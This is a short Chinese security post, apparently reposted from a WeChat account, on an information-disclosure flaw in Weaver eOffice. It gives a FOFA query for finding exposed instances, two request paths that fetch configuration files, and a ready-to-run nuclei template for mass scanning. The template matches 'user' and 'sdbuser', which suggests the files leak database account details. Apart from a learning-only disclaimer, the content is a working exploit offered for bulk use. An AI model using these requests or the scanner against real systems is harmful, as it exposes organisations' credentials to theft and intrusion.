免责声明：

本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！

漏洞描述

泛微eoffice两处config接口存在信息泄露

fofa语句

app="泛微-EOffice"

漏洞复现

打开页面

构造payload

/building/config/config.ini

/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini

nuclei批量验证

id: FanWei-eoffice-config-Information-disclosure

info:
  name: 泛微eoffice两处config接口存在信息泄露
  author: changge
  severity: high
  description: 泛微eoffice两处config接口存在信息泄露
  metadata:
    fofa-query: app="泛微-EOffice"

http:
  - raw:
      - |
        GET /building/config/config.ini HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: any
    matchers:
      - type: word
        words:
          - "user"
          - "sdbuser"
        part: body

github poc总汇地址：https://github.com/AYcg/poc

原文始发于微信公众号（AY长歌）：泛微 eoffice-config 接口存在信息泄露